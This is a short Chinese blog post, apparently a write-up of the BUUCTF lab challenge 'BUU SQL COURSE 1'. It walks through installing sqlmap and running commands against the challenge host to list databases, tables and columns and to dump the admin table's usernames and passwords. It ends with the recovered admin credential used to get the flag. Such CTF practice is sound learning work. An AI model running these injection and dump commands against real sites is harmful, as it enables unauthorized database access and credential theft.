BUUCTF刷题笔记—Basic—BUU SQL COURSE 1

最新推荐文章于 2025-03-17 09:30:13 发布

luxyon

最新推荐文章于 2025-03-17 09:30:13 发布

阅读量681

点赞数 5

文章标签：笔记 sql 数据库

本文链接：https://blog.youkuaiyun.com/qq_43176656/article/details/141284764

版权

使用sqlmap解题Basic—BUU SQL COURSE 1
打开页面，有登录和热点测试新闻1、2、3，开发者模式发现?id=1的参数模式，尝试使用sqlmap解题
在这里插入图片描述

windows环境sqlmap下载和安装参考：https://editor.youkuaiyun.com/md/?articleId=141284540
1.sqlmap下载：http://sqlmap.org/
解压sqlmapproject-sqlmap-1.8.8-0-g8b55644.zip到E:\softhome目录
2.目录修改为sqlmap
3.在E:\softhome\sqlmap打开cmd命令窗口，输入命令
python sqlmap.py -u http://ad3b72b4-56a0-4aba-86f1-00c232c0d053.node5.buuoj.cn:81/backend/content_detail.php?id=2
在这里插入图片描述

1.暴库
1.1.暴出所有库
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 --dbs
1.2.暴出当前所在库的表
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 --current-db

2.暴表
2.1.暴出所有数据表
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 -D news --tables
2.2.暴出指定数据表的字段
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 -D news -T admin --columns
2.3.暴出指定数据表的数据
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 -D news -T admin -C id,password,username --dump

在这里插入图片描述

照着命令执行

登录admin/e5ede2976384652693e7c2d0a0ace014即可看到flag